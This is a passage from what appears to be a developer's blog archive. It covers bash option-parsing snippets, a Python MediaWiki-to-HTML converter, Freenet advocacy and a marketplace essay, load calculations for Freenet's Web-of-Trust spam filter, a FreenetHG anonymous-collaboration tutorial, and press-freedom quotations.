# # actually parse the options
# PROGNAME=`basename $0`
# ARGS=`getopt --name "$PROGNAME" --long help,verbose,version,output: --options hvo: -- "$@"`
# if [ $? -ne 0 ]; then
#   exit 1
# fi
# eval set -- $ARGS

# default options
HELP=no
VERBOSE=no
VERSION=no
OUTPUT=no

# check, if the default wisp exists and can be executed. If not, fall
# back to wisp.py (which might be in PATH).
if [ ! -x $WISP ]; then
    WISP="wisp.py"
fi

while [ $# -gt 0 ]; do
    case "$1" in
        -h | --help)        HELP=yes;;
        -o | --output)      OUTPUT="$2"; shift;;
        -v | --verbose)     VERBOSE=yes;;
        --version)          VERSION=yes;;
        --)              shift; break;;
    esac
    shift
done
# all other arguments stay in $@
<<using-options>>

2.12 act on options

# Provide help output

if [[ $HELP == "yes" ]]; then
    echo "$0 [-h] [-v] [-o FILE] [- | filename]
        Show commandline option parsing.

        -h | --help)        This help output.
        -o | --output)      Save the executed wisp code to this file.
        -v | --verbose)     Provide verbose output.
        --version)          Print the version string of this script.
"
    exit 0
fi

if [[ x"$VERSION" == x"yes" ]]; then
    echo "$version"
    exit 0 # script ends here
fi

if [[ ! x"$OUTPUT" == x"no" ]]; then
    echo writing to $OUTPUT
fi

# just output all other arguments
if [ $# -gt 0 ]; then
    echo $@
fi

2.13 default help output formatting

prog [OPTIONAL_FLAG] [OPTIONAL_ARGUMENT VALUE] REQUIRED_ARGUMENT...
# ... means that you can specify something multiple times
# short and long options
prog [-h | --help] [-v | --verbose] [--version] [-f FILE | --file FILE] 
# concatenated short options
hg help [-ec] [THEMA] # hg help -e -c == -ec

2.14 Common parameters for commands

prog --help # provide help output. Often also -h
prog --version # version of the program. Often also -v
prog --verbose # often to give more detailed information. Also --debug

These follow convention and the GNU coding standards.

2.15 Command chaining

echo 1 ; echo 2 ; echo 3 # sequential
echo 1 & echo 2 & echo 3 # backgrounding: possibly parallel

grep foo test.txt && echo foo is in test.txt # conditional: Only if grep is successful
grep foo test.txt || echo foo is not in test.txt # conditional: on failure

2.16 Math (bash-builtin)

echo $((1+2)) # 3
a=2
b=3
echo $((a*b)) # 6
echo $((a**$(echo 3))) # 8

2.17 help

man [command]
info [topic]
info [topic subtopic]
# emacs: C-h i

more convenient info:

function i()
{
    if [[ "$1" == "info" ]]; then
        info --usage -f info-stnd
    else
        # check for usage from fast info, if that fails check man and if that also fails, just get the regular info page.
        info --usage -f "$@" 2>/dev/null || man "$@" || info "$@"
    fi
}

turn files with wikipedia syntax to html (simple python script using mediawiki api)

I needed to convert a huge batch of mediawiki-files to html (had a 2010-03 copy of the now dead limewire wiki lying around). With a tip from RoanKattouw in #mediawiki@freenode.net I created a simple python script to convert arbitrary files from mediawiki syntax to html.

Usage:

  • Download the script and install the dependencies (yaml and python 3).
  • ./parse_wikipedia_files_to_html.py <files>

This script is not written for speed or anything (do you know how slow a web request is, compared to even horribly inefficient code? …): the only optimization is for programming convenience — the advantage of that is that it’s just 47 lines of code :)

It also isn’t perfect: it breaks at some pages (and informs you about that).

It requires yaml and Python 3.x.

#!/usr/bin/env python3

"""Simply turn all input files to html. 
No errorchecking, so keep backups. 
It uses the mediawiki webapi, 
so you need to be online.

Copyright: 2010 © Arne Babenhauserheide
License: You can use this under the GPLv3 or later, 
         if you add the appropriate license files
         → http://gnu.org/licenses/gpl.html
"""

from urllib.request import urlopen
from urllib.parse import quote
from urllib.error import HTTPError, URLError
from time import sleep
from random import random
from yaml import load
from sys import argv

mediawiki_files = argv[1:]

def wikitext_to_html(text):
    """parse text in mediawiki markup to html."""
    url = "http://en.wikipedia.org/w/api.php?action=parse&format=yaml&text=" + quote(text, safe="") + " "
    f = urlopen(url)
    y = f.read()
    f.close()
    text = load(y)["parse"]["text"]["*"]
    return text

for mf in mediawiki_files:
    with open(mf) as f:
        text = f.read()
    HTML_HEADER = "<html><head><title>" + mf + "</title></head><body>"
    HTML_FOOTER = "</body></html>"
    try: 
        text = wikitext_to_html(text)
        with open(mf, "w") as f:
            f.write(HTML_HEADER)
            f.write(text)
            f.write(HTML_FOOTER)
    except HTTPError:
        print("Error converting file", mf)
    except URLError:
        print("Server doesn’t like us :(", mf)
        sleep(10*random())
    # add a random wait, so the api server doesn’t kick us
    sleep(3*random())

Attachments:
parse_wikipedia_files_to_html.py.txt (1.47 KB)

Freenet

When free speech dies, we need a place to organize.

Freenet is a censorship resistant, distributed p2p-publishing platform.

Too technical? Let’s improve that: Freenet is the internet's last, best hope for Freedom. Join now:

freenetproject.org

It lets you anonymously share files, browse and publish “freesites”, chat on forums and even do microblogging, using a generic Web of Trust, shared by different plugins, to avoid spam. For really careful people it offers a “darknet” mode, where users only connect to their friends, which makes it very hard to detect that they are running freenet.

The overarching design goal of freenet is to make censorship as hard as technically possible. That’s the reason for providing anonymity (else you could be threatened with repercussions - as seen in the case of the wikileaks informer from the army in the USA), building it as a decentralized network (else you could just shut down the central website, as people tried with wikileaks), providing safe pseudonyms and caching of the content on all participating nodes (else people could censor by spamming or overloading nodes) and even the darknet mode and enhancements in usability (else freenet could be stopped by just prosecuting everyone who uses it, or it would reach too few people to be able to counter censorship in the open web).

I don’t know anymore what triggered my use of freenet initially, but I know all too well what keeps me running it instead of other anonymizers:

I see my country (Germany) turning more and more into a police state, starting with attacks on p2p, continuing with censorship of websites (where infrastructure created to block child porn is now used to block websites of climate activists) and leading into directions I really don’t like.

And in case the right for freedom of speech dies, we need a place where we can organize to get it back and fight for the rights laid out in our constitution (the Grundgesetz).

When free speech dies, we need a place to organize.

And that’s what Freenet is to me.

A technical way to make sure we can always organize, acting by article 20 of our constitution (link in German): the right to oppose everyone who wants to abolish our constitutional order.

PS: New entries on my site are also available in freenet (via freereader: downloads RSS feeds and republishes them in freenet).

PPS: If you like this text, please redent/retweet the associated identi.ca/twitter notices so it spreads:

50€ for the Freenet Project - and against censorship

As I pledged1, I just donated to freenet 50€ of the money I got back because I cannot go to FilkCONtinental. Thanks go to Nemesis, a proud member of the “FiB: Filkers in Black” who will take my place at the Freusburg and fill these old walls with songs of stars and dreams - and happy laughter.

It’s a hard battle against censorship, and as I now had some money at hand, I decided to do my part (freenetproject.org/donate.html).


  1. The pledge can be seen in identi.ca and in a Sone post in freenet (including a comment thread; needs a running freenet node (install freenet in a few clicks) and the Sone plugin). 

A bitcoin-marketplace using Freenet?

A few days ago xor, the developer of the Web of Trust in Freenet, got in contact with the brain behind the planned Web of Trust for Openbazaar, and toad, the former maintainer of Freenet, questioned whether we would actually want a marketplace using Freenet.

I took a few days to ponder the question, and I think a marketplace using Freenet would be a good idea - for Freenet as well as for society.

Freenet is likely the most secure way for implementing a digital market, which means it can work safely for small sums, but not for large ones - except if you can launder huge amounts of digital money. As such it is liberating for small people, but not for syndicates. For example a drug cartel needs to be able to turn lots of money into clean cash to pay henchmen abroad. Since you can watch bitcoin more easily than cash and an anonymous network makes it much harder to use scare-tactics against competing sellers, moving the marketplace from the street to the internet weakens syndicates and other organized crime by removing part of their options for creating a monopoly by force.

If a bitcoin marketplace with some privacy for small-scale users should become a bigger problem than the benefit it brings by weakening organized crime, any state or other big player can easily force the majority of users to reveal their identities by using the inherent traceability of bitcoin transactions.

Also the best technologies in freenet were developed (or rather: got to widespread use), because it had to actually withstand attacks.

Freenet as marketplace with privacy for small people equivalent to cash-payments would also help improve its suitability for whistleblowers - see hiding in the forest: A better alternative.

For free speech this would also help, because unlike other solutions, freenet has the required properties for that: a store with lifetime depending on the popularity of content, not the power of the publisher, which provides DoS-resistant hosting without the need to have a 24/7 server, stable and untraceable pseudonyms (ignoring fixable attack-vectors) and an optional friend-to-friend darknet.

In short: A decentralized ebay-killer would be cool and likely beneficial to Freenet and Free Speech without bringing actual benefit for organized crime.

Also this might be what is needed to bring widespread darknet adoption.

And last but not least, we would not be able to stop people from implementing a marketplace over freenet: Censorship resistance also means resistance against censorship by us.

Final note: Openbazaar is written in Python and Freenet has decent Python bindings (though they are not beautiful everywhere), so it should not be too hard to use it for Openbazaar. A good start could be the WoT-code written for Infocalypse in last year’s GSoC: Web of Trust integration as well as private messaging.

AnhangGröße
freenet_logo.png16.72 KB
freenet-banner.png3.39 KB

A deterministic upper bound for the network load of the fully decentralized Freenet spam filter

Goal: Improve the decentralized spam filter in Freenet (WoT) to have deterministic network load, bounded to a low, constant number of subscriptions and fetches.

This article provides calculations which show that decentralized spam filtering with privacy through pseudonyms can scale to communication systems that connect all of humanity. It is also applicable to other systems than Freenet, see use in other systems.

Originally written as a comment to bug 3816. The bug report said "someone SHOULD do the math". I then did the math. Here I’m sharing the results.

Useful prior reading is Optimizing a distributed spam filter for Freenet.

This proposal has two parts:

  1. Ensuring an upper bound on the network cost, and
  2. Limiting the cost due to checking stale IDs.

Slang

  • ID, "identity" or "pseudonym" is a user account. You can have multiple.
  • OwnID is one of your own identities, a pseudonym you control.
  • Trust is a link from one ID (a) to another ID (b). It has a numerical value.
    • Positive values mean that (a) considers (b) to be a constructive contributor.
    • Negative values mean that (a) thinks that (b) is trying to disrupt communication.
  • Key is an identifier you can use as part of a link to download data. Every ID has one key.
  • Editions are the versions of keys. They are increased by one every time a key is updated.
  • Fetch means to download some data from some key for some edition.
  • Subscription is a lightweight method to get informed if a key was updated to a new edition.
  • Edition hints are part of an ID. They show for each trusted ID (b) which edition of it was last seen by the trusting ID (a).
  • The rank of an ID describes the number of steps needed to get from your OwnID to that ID when following trust paths.

Variables

  • N the number of identities the OwnID gave positive trust to. Can be assumed to be bounded to 150 active IDs (as by Dunbar’s number).⁰
  • M a small constant for additional subscriptions, e.g. 10.
  • F a small constant for additional fetches per update, e.g. 10.

⁰: https://en.wikipedia.org/wiki/Dunbar's_number - comment by bertm: that assumes all statements of "OwnID trusts ID to not be a spammer" to be equivalent to "OwnID has a stable social relationship with ID". I'm not quite sure of that equivalence. That said, for purposes of analysis, we can well assume it to be bounded by O(1).

Limit network load with a constant upper bound

Process

Subscribe to all rank 1 IDs (which have direct trust from your OwnID). These are the primary subscriptions. There are N primary subscriptions.

All the other IDs are split into two lists: rank2 (secondary IDs) and rank3+ (three or more steps to reach them). Only a subset of those get subscriptions, and the subset is regularly changed:

  • Subscribe to the M rank2 IDs which were most recently updated. These have the highest probability of being updated again. The respective list must be updated whenever a rank2 ID is fetched successfully (the ordering might change).
  • Subscribe to the M rank3+ IDs which were most recently updated. The respective list must be updated whenever a rank3+ ID is fetched successfully (the ordering might change).
  • Subscribe to M rank2 IDs chosen at random (secondary subscriptions). When a secondary or random subscription yields an update, replace it with another ID of rank2, chosen at random.
  • Subscribe to M IDs of rank 3 or higher chosen at random (random subscriptions). When a random subscription yields an update, replace it with another rank3+ ID, chosen at random.

Also replace one of the randomly chosen rank2 subscriptions and one of the randomly chosen rank3+ subscriptions every hour. This ensures that WoT will always eventually see every update.

If any subscription yields an update, download its key and process all edition hints. Queue these as fetches in separate queues for rank1 (primary), rank2 (secondary), and rank3+ (random), and process them independently.

At every update of a subscription (rank1, rank2, or rank3+), choose F fetches from the respective edition hint fetch queue at random and process them. This bounds the network load to ((N × F) + (4M × F)) × update frequency.

These fetches and subscriptions must be deduplicated: If we already have a subscription, there’s no use in starting a fetch, since the update will already have been seen.
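
A rough sketch in Python of how the subscription set could be assembled (the names rank1, rank2, rank3plus and last_update are placeholders for this illustration, not actual WoT code):

import random

M = 10  # additional subscriptions per category, as defined above

def choose_subscriptions(rank1, rank2, rank3plus, last_update):
    """Select the IDs to subscribe to; using a set deduplicates automatically.

    rank1, rank2, rank3plus: lists of IDs per rank.
    last_update: dict mapping ID -> time of its last seen update.
    """
    def most_recent(ids):
        return sorted(ids, key=lambda i: last_update.get(i, 0), reverse=True)[:M]
    subscriptions = set(rank1)                     # N primary subscriptions
    subscriptions.update(most_recent(rank2))       # M most recently updated rank2 IDs
    subscriptions.update(most_recent(rank3plus))   # M most recently updated rank3+ IDs
    subscriptions.update(random.sample(rank2, min(M, len(rank2))))          # M random rank2 IDs
    subscriptions.update(random.sample(rank3plus, min(M, len(rank3plus))))  # M random rank3+ IDs
    return subscriptions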

Calculating the upper bound of the cost

To estimate an upper bound for the fetch frequency, we can use the twitter frequency, which is about 5 tweets per day on average and 10 to 50 for people with many followers¹ (those are more likely to be rank1 IDs of others).

There are two possible extremes: Very hierarchic trust structure and egalitarian trust structure. Reality is likely a power-law structure.

  • In a hierarchic trust structure, we can assume that rank1 or rank2 IDs (trustee subscriptions) are all people with many followers, so we use 22 updates per day (as by ¹).
  • In an egalitarian trust structure we can assume 5 updates per day (as by ¹).

For high frequency subscriptions (most recently updated) we can assume 4 updates per hour for 16 hours per day, so 64 updates per day.⁰ For random subscriptions we can assume 5 updates per day (as by ¹).

¹: http://blog.hubspot.com/blog/tabid/6307/bid/4594/Is-22-Tweets-Per-Day-the-Optimum.aspx ← on the first google page, not robust, but should be good enough for this usecase.

((N × F) + (M × F)) × trustee update frequency + 2M × F × high update frequency + M × F × random update frequency.

For a very hierarchic WoT (primaries are very active) this gives the upper bound:

= (150 × 10 × 22) + (10 × 10 × 22) + (10 × 10 × 64) + (10 × 10 × 5) + (10 × 10 × 64)
= (1500 × 22) + (100 × 22) + (100 × 64) + (100 × 5) + (100 × 64)
= 33000 + 2200 + 6400 + 500 + 6400 # primary triggered + random rank2 + active rank2 + random rank3+ + active rank3+
= 48500 fetches per day
~ 34 fetches per minute.

For an egalitarian trust structure (primaries have average activity) this gives the upper bound:

= (150 × 10 × 5) + (10 × 10 × 5) + (10 × 10 × 64) + (10 × 10 × 5) + (10 × 10 × 64)
= (1500 × 5) + (100 × 5) + (100 × 64) + (100 × 5) + (100 × 64)
= 7500 + 500 + 6400 + 500 + 6400 # primary triggered + random rank2 + active rank2 + random rank3+ + active rank3+
= 21300 fetches per day
~ 15 fetches per minute.
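
As a cross-check of the arithmetic, a few lines of Python reproduce both bounds from the formula above (all frequencies per day, numbers as assumed in the text):

N, M, F = 150, 10, 10  # directly trusted IDs, extra subscriptions per category, fetches per update

def fetches_per_day(trustee_freq, high_freq=64, random_freq=5):
    # ((N + M) * F) * trustee + 2M * F * high + M * F * random
    return ((N + M) * F) * trustee_freq + 2 * M * F * high_freq + M * F * random_freq

for name, trustee_freq in (("hierarchic", 22), ("egalitarian", 5)):
    per_day = fetches_per_day(trustee_freq)
    print(name, per_day, "fetches per day, about", round(per_day / (24 * 60)), "per minute")
# hierarchic 48500 fetches per day, about 34 per minute
# egalitarian 21300 fetches per day, about 15 per minute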

This gives a plausible upper bound of the network load per day from this scheme, assuming a very centralized WoT. The upper bound for a very hierarchic trust structure is dominated by the primary subscriptions. The upper bound for an egalitarian trust structure is dominated by the primary subscriptions and the high frequency subscriptions.

The rank2 subscriptions and the random subscriptions together make up about 5% of the network load. They are needed to guarantee that the WoT always eventually converges to a globally consistent view.

One fetch for an ID transfers about 1KiB data. For a hierarchic WoT (one fetch per two seconds) this results in a maximum bandwidth consumption on a given node of 1KiB/s × hops. This is about 5KiB/s for the average of 5 hops — slightly higher than our minimum bandwidth. For an egalitarian WoT this results in a maximum bandwidth consumption on a given node of 0.5KiB/s × hops. This is about 2.5KiB/s for the average of 5 hops — 60% of our minimum bandwidth. The real bandwidth requirement should be lower, because IDs are cached very well.

The average total number of subscriptions to active IDs should be bounded to 190.

⁰: The cost of active IDs might be overestimated here, because WoT has an upper bound of one update per hour. In this case the cost of this algorithm would be reduced by about 30% for the egalitarian structure and by about 10% for the hierarchic structure.

prune subscriptions to stale IDs to improve the rank2+ update detection delay to (less than) O(N), with N the known active IDs

The process to check IDs with rank >= 2 can be improved from essentially checking them at random (with the real risk of missing IDs — there is no guarantee to ever check them all, not even networkwide), to having each active ID check all IDs in O(N) (with N the number of IDs).

Process

When removing a random subscription to an ID with rank2 or higher, with 50% probability add the ID+currentversion to a blocklist which avoids processing this same ID with this or a lower version again and prune it from the WoT.¹

When receiving a version hint from another ID with a higher version than the one which is blocked, the ID is removed from the blocklist.

The total cost in memory is on the order of the number of old IDs already checked, bounded to O(N), the number of Identities.

¹: Pruning the ID from WoT is not strictly necessary on the short term. However on the long term (a decade and millions of users), we must remove information.

Expected effect

Assume that 9k of the 10k IDs in WoT are stale (a reasonable assumption, because only about 300 IDs are inserted from an up to date version of WoT right now).

When replacing one random rank2 and one random rank3+ subscription per hour, that yields about 16k subscription replacements per year, or (in a form which simplifies the math) about two replacements per ID in the WoT.

Looking at only a single ID:

For the first replacement there is a 90% probability that the ID in question is stale, and a 50% probability that it will be put on the blocklist if it is stale, which yields a combined 45% probability that the number of stale IDs decreases by one. In other words, it takes on average 2.2 steps to remove the first stale ID from the IDs to check.

As a rough estimate, for 10 IDs it would take 15 steps to prune out 5 of the 9 stale IDs. Scaling this up should give an estimation of the time required for 9k IDs. So after about 15k steps (one year) half the stale IDs should be on the blocklist.

Looking at the whole network

For a given stale ID, after one year there is roughly a 50% chance that it is on the blocklist of a given active ID. But the probability that it is on the blocklist of every active ID is just about 0.5^k, with k the number of active IDs. So when there is an update to this previously stale ID, it is almost certain that some ID will see it and remove it from the blocklists of most other IDs within O(N) steps by providing an edition hint (this will accelerate as more stale IDs are blocked).

Rediscovering inactive IDs when they return

I am sure that there is a beautiful formula to calculate exactly the proportion of subscriptions to stale IDs we’ll have with this algorithm when it entered a steady state, and the average discovery time for a previously stale ID to be seen networkwide again when it starts updating again. To show that this algorithm should work, we only need a much simpler answer, though:

How long will it take an ID which was inactive for 10 years to be seen networkwide again (if its direct trusters are all inactive, else the primary subscriptions would detect and spread its update within minutes)?

After 10 years, the ID will be on the blocklist of 99.9% of the IDs. In a network with 10k active IDs, that means that only about 10 IDs did not block it yet¹. Every year there is a 50% probability for each of the IDs that the update will be seen.

Therefore detection of the update to an ID which was inactive for 10 years and whose direct trusters are all inactive will take about 10 weeks. Then the update should spread rapidly via edition hints.

¹: There is a 7% probability that 15 or more IDs could still see it and a 1.2% probability that less than 5 IDs still see it. The probability that only a single ID did not block it yet is just 0.005%. In other words: If 99% of IDs would become inactive and then active again after 10 years, approximately one will need about two years to be seen and most will be detected again within 10 weeks. Therefore this scheme is robust against long-term inactivity.

Summary

This algorithm can give the distributed spam filter in Freenet a constant upper bound in cost without limiting interaction.

A vision for a social Freenet with WoT, FreeTalk and Sone

I let my thought wander a bit around the question how a social Freenet (2.0 ;) ) could look from the view of a newcomer.

I imagine myself installing freenet. The first thing to come up after starting it is the node page. (italic text in brackets is a comment. The links need a Freenet running on 127.0.0.1 to work)


“Welcome to Freenet, where no one can tell you’re reading”

“Freenet tries hard to protect your privacy. Therefore we created a pseudonymous ID for you. Its name is Gandi Schmidt. Visit the [your IDs site] to see a legend we prepared for you. You can use this legend as fictional background for your ID, if you are really serious about staying anonymous.”

(The name should be generated randomly for each ID. A starting point for that could be a list of scientists from around the world compiled from the wikipedia (link needs freenet). The same should be true for the legend, though it is harder to generate. The basic information should be a quote (people remember that), a job and sex, the country the ID comes from (maybe correlated with the name) and a hobby.)

“During the next few restarts, Freenet will ask you to solve various captchas to prove that you are indeed human. Once enough other nodes successfully confirmed that you are human, you will gain write access to the forums and microblogging. This might take a few hours to a few days.”

(as soon as the ID has sufficient trust, automatically activate posting to FreeTalk, Sone and others. Access is delayed to ensure that when people talk they can get answers)

“Note that other nodes don’t know who you are. They don’t know your IP, nor your real identity. The only thing they know is that you exist, that you can solve captchas and how to send you a message.”

“You can create additional IDs at any time and give them any name and legend you choose by adding it on the WebOfTrust-page. Each new ID has to verify for itself that it’s human, though. If you carefully keep them separate, others can only find out with a lot of effort that your IDs are related. Mind your writing style. In doubt, keep your sentences short. To make it easier for you to stay anonymous, you can autogenerate Name and Legend at random.”

“While your humanity is being confirmed, you can find a wealth of content on the following indexes, some published anonymously, some not. If you want to publish your own anonymous site, see Upload a Freesite. The list of indexes uses dynamic bookmarks. You get notified whenever a bookmarked site (like the indexes below) gets updated.”

“Note: If you download content from freenet, it is being cached by other nodes. Therefore popular content is faster than rare content and you cannot overload nodes by requesting their data over and over again.”

“You are currently using medium security in the range from low to high.”

“In this security level, separated IDs are no perfect protection of your anonymity, though, since other members might not be able to see what you do in Freenet, but they can know that you use freenet in the first place, and corporations or governments with medium-sized infrastructure can launch attacks which might make it possible to trace your contributions and accesses. If you want to disappear completely from the normal web and keep your freenet usage hidden, as well as make it very hard to trace your contributions, to be able to really exercise your right of free speech without fearing repercussions, you can use Freenet as Darknet — the more secure but less newcomer friendly way to use freenet; the current mode is Opennet.”

“To enter the Darknet, you add people you know and trust personally as your darknet friends. As soon as you have enough trusted friends, you can increase the security level to high and freenet will only connect to your trusted friends, making you disappear from the regular internet. The only way to tell that you are using freenet will then be to force your ISP to monitor all traffic coming from your computer.”

“And once transport plugins are integrated, steganography will come into reach and allow masking your traffic as regular internet usage, making it very hard to distinguish freenet from encrypted internet-telephony. If you want to help making this a reality in the near future, please consider contributing or donating to freenet.”

“Welcome to the pseudonymous web where no one can know who you are, but only that you are always using the same ID — if you do so.”

“To show this welcome message again, you can at any time click on Intro in the links.”


What do you think? Would this be a nice way to integrate WoT, FreeTalk, Sone and general user education in a welcome message, while adding more incentive to keep the node running?

PS: Also posted in the Freenet Bugtracker, in Freetalk and in Sone – the last two links need a running Freenet to work.

PPS: This vision is not yet a reality, but all the necessary infrastructure is already in place and working in Freenet. You can already do everything described in here, just without the nice guide and the level of integration (for example activating plugins once you have proven your humanity, which equals enough trust by others to be actually seen).

Anonymous code collaboration with Mercurial and Freenet

Anonymous DVCS in the Darknet.

There is a new Mercurial extension for interaction with Freenet called "infocalypse" (which should keep working after the information apocalypse).

It offers "fn-push" and "fn-pull" as an optimized way to store code in freenet: bundles are inserted and pulled one after the other. An index tells infocalypse in which order to pull the bundles. It makes using Mercurial in freenet far more efficient and convenient.

Real Life Infocalypse
easy setup of infocalypse (script)
distributed, anonymous development

Also you can use it to publish collaborative anonymous websites like the freefaq and Technophob.

And it is a perfect fit for the workflow automatic trusted group of committers.

Otherwise it offers the same features as FreenetHG.


The rest of the article is concerned with the older FreenetHG extension. If you need to choose between the two, use Infocalypse: Its concept for sharing over Freenet is more robust.


Using FreenetHG you can collaborate anonymously without having to give everyone direct write access to your code.

To work with others, you simply setup a local repository for your own work and use FreenetHG to upload your code automatically into Freenet under your private ID. Others can then access your code with the corresponding public ID, do their changes locally and publish them in their own anonymous repository.

You then pull changes you like into your repository and publish them again under your key.

FreenetHG uses freenet which offers the concept of pseudonymity to make anonymous communication more secure and Mercurial to allow for efficient distributed collaboration.

With pseudonymity you can't find out whom you're talking to, but you know that it is the same person, and with distributed collaboration you don't need to let people write to your code directly, since every code repository is a full clone of the main repository.

Even if the main repository should go down, every contributor can still work completely unhindered, and if someone else breaks things in his repository, you can simply decide not to pull the changes from him.

What you need

To use FreenetHG you obviously need a running freenet node and a local Mercurial installation. Also you need the FreenetHG plugin for Mercurial and PyFCP which provides Python bindings for Freenet.

  • get FreenetHG (the link needs a running freenet node on 127.0.0.1)
  • alternatively just do

    hg clone static-http://127.0.0.1:8888/USK@fQGiK~CfI8zO4cuNyhPRLqYZ5TyGUme8lMiRnS9TCaU,E3S1MLoeeeEM45fDLdVV~n8PCr9pt6GMq0tuH4dRP7c,AQACAAE/freenethg/1/

Setup a simple anonymous workflow

To guide you through the steps, let's assume we want to create the anonymous repository "AnoFoo".

After you got all dependencies, you need to activate the FreenetHG plugin in your ~/.hgrc file

[extensions]
freenethg = path/to/FreenetHG.py

You can get the FreenetHG.py from the freenethg website or from the Mercurial repository you cloned.

Now you setup your anofoo Mercurial repository:

hg init AnoFoo

As a next step we create some sections in the .hg/hgrc file in the repository:

[ui]

[freenethg]

[hooks]

Now we enter the repository and use the setup wizard

cd AnoFoo
hg fcp-setupwitz

The setup wizard asks us for the username to use for this repository (to avoid accidentally breaking our anonymity), the address of our freenet instance and the path to our repository on freenet.

The default answers should fit. The only one where we have to set something else is the project name. There we enter AnoFoo.

Since we don't yet have a freenet URI for the repository, we just answer '.' to let FreenetHG generate one for us. That's also the default answer.

The commit hook makes sure that we don't commit with another but the selected username.

Also the wizard will print a line like the following:

Request uri is: USK@xlZb9yJbGaKO1onzwawDvt5aWXd9tLZRoSoE17cjXoE,zFqFxAk15H-NvVnxo69oEDFNyU9uNViyNN5ANtgJdbU,AQACAAE/freenethg_test/1/

This is the line others can use to clone your project and pull from it.

And with this we finished setting up our anonymous collaboration repository.

When we commit, every commit will directly be uploaded into Freenet.

So now we can pass the freenet Request uri to others who can clone our repository and setup their own repositories in freenet. When they add something interesting, we then pull the data from their Request uri and merge their code with ours.

Setup a more convenient anonymous workflow

This workflow is already useful, but it's a bit inconvenient to have to wait after each commit until your changes have been uploaded. So we'll now change this basic workflow a bit to be able to work more conveniently.

First step: clone our repositories to a backup location:

hg clone AnoFoo BackFoo

Second step: change our .hg/hgrc to only update when we push to the backup repository, and add the default-push path to the backup repository:

[paths]
default-push = ../BackFoo

[hooks]                                                               
pretxncommit = python:freenethg.username_checker                      
outgoing = python:freenethg.updatestatic_hook                           

[ui]
username = anonymuse

[freenethg]
commitusername = anonymuse
inserturi = USK@VERY_LONG_PRIVATE_KEY/AnoFoo/1/

Changes: We now have a default-push path, and we changed the "commit" hook to an "outgoing" hook which is invoked every time changes leave this repository. It will also be invoked when someone pulls from this repo, but not when we clone it locally.

Now our commits roll as fast as we're used to from other Mercurial repositories and freenethg will make sure we don't use the wrong username.

When we want to anonymously publish the repository we then simply use

hg push

This will push the changes to the backup and then upload it to your anonymous repository.

And now we have finished setting up our repository and can begin using an anonymous and almost infinitely scalable workflow which only requires our freenet installation to be running when we push the code online.

One last touch: If an upload should chance to fail, you can always repeat it manually with

hg fcp-uploadstatic

Time to go

...out there and do some anonymous coding (Maybe with the workflow automatic trusted group of committers).

Happy hacking!

And if this post caught your interest or you want to say anything else about it, please write a comment.

Also please have a look at and vote for the wish to add a way to contribute anonymously to freenet, to make it secure against attacks on developers.

And last but not least: vote for this article on digg and on yigg.

Answers to “I can't use Freenet”

Short answers to questions from a message in the anonymous Freenet Message System:

Ultra-short answer: Go to https://freenetproject.org/pages/download.html and run the installer. It’s fast and easy.

Now onward to the message:

psst@GdwO… wrote :

ArneBab@-jtT… wrote : Yes. And that’s one of the reasons why we need Freenet: to wrestle back control over our communication channel.

Good luck getting people to use it though.

Yes, that’s something we need to fix. And there’s a lot we can do for that. It’s just a lot of boring work.

Let’s go through your points and see which we could fix:

I can't use Freenet. It's illegal! It isn't? How do you know?

It’s created by a registered tax-exempt charity1, how can it be illegal?

I don't want people to think I'm some kind of paranoid nutjob.

Maybe we should add some quotes from the Guardian on the frontpage, and maybe also quote the CNN news about Freenet as a counterpoint?

»You don't need to be talking to a terror suspect to have your communications data analysed by the NSA. The agency is allowed to travel "three hops" from its targets — who could be people who talk to people who talk to people who talk to you. Facebook, where the typical user has 190 friends, shows how three degrees of separation gets you to a network bigger than the population of Colorado. How many people are three "hops" from you?« — The Guardian in NSA files decoded, 2013.

»There is now no shield from forced exposure. . . The foundation of Groklaw is over. . . the Internet is over« – Groklaw, Forced Exposure (2013-08-20)

»This is the most visible line in the sand for people: Can they see my dick?« — »When your junk was passed by Gmail (to a foreign server), the NSA caught a copy of that.« — John Oliver and Edward Snowden in Last Week Tonight: Government Surveillance, 2015, quoted by engadget in Snowden shows John Oliver how the NSA can see your dick pics.

»there is no central server and no one knows who's using it so it can not be shut down … where there is a message it is likely to find a medium.« — CNN about Freenet, 2005-12-19.

Why don't you grow up, and just accept that you have to be ruled by authority? It's just the way the world works!

Democracy without free press is meaningless. Let’s quote some presidents on this.

»The liberty of the press is essential to the security of freedom in a state: it ought not, therefore, to be restrained in this commonwealth.« — John Adams, 1780, second president of the USA.

»When people talk of the Freedom of Writing, Speaking, or thinking, I cannot choose but laugh. No such thing ever existed. No such thing now exists; but I hope it will exist. But it must be hundreds of years after you and I shall write and speak no more.« — John Adams Letter to Thomas Jefferson (15 July 1817)

»No experiment can be more interesting than that we are now trying, and which we trust will end in establishing the fact, that man may be governed by reason and truth. Our first object should therefore be, to leave open to him all the avenues to truth. The most effectual hitherto found, is the freedom of the press.« — Thomas Jefferson, third president of the USA, in a letter to Judge John Tyler (June 28, 1804)

»Our liberty depends on the freedom of the press, and that cannot be limited without being lost.« — Thomas Jefferson, letter to Dr. James Currie (28 January 1786) Lipscomb & Bergh 18:ii.

»What makes it possible for a totalitarian or any other dictatorship to rule is that people are not informed; how can you have an opinion if you are not informed?« — Hannah Arendt, 1974

»And that is why our press was protected by the First Amendment — the only business in America specifically protected by the Constitution — … to inform, to arouse, to reflect, to state our dangers and our opportunities, to indicate our crises and our choices, to lead, mold, educate and sometimes even anger public opinion.« — John F. Kennedy, 35th president of the United States, Address before the American Newspaper Publishers Association (27 April 1961)

»Without general elections, without freedom of the press, freedom of speech, freedom of assembly, without the free battle of opinions, life in every public institution withers away, becomes a caricature of itself, and bureaucracy rises as the only deciding factor.« — Rosa Luxemburg, Reported in Paul Froelich, Die Russische Revolution (1940).

»A popular Government without popular information, or the means of acquiring it, is but a Prologue to a Farce or a Tragedy, or perhaps both.« — James Madison, fourth president of the USA, in a letter to W.T. Barry (1822-08-04).

»A critical, independent and investigative press is the lifeblood of any democracy.« — Nelson Mandela on freedom of expression, At the international press institute congress (14 February 1994).

»we believe that when governments censor or control information, that ultimately that undermines not only the society, but it leads to eventual encroachments on individual rights as well.« — Barack Obama, 44th president of the USA, in Rangoon, Burma on November 14, 2014

»If in other lands the press and books and literature of all kinds are censored, we must redouble our efforts here to keep them free.« — Franklin D. Roosevelt, 32nd president of the USA, Address to the National Education Association (30 June 1938).

»The liberty of the press is no greater and no less than the liberty of every subject of the Queen.« — Lord Russell of Killowen, Reg. v. Gray (1900), L. R. 2 Q. B. D. 40.

… and many more by Wikiquote: Freedom of the press.

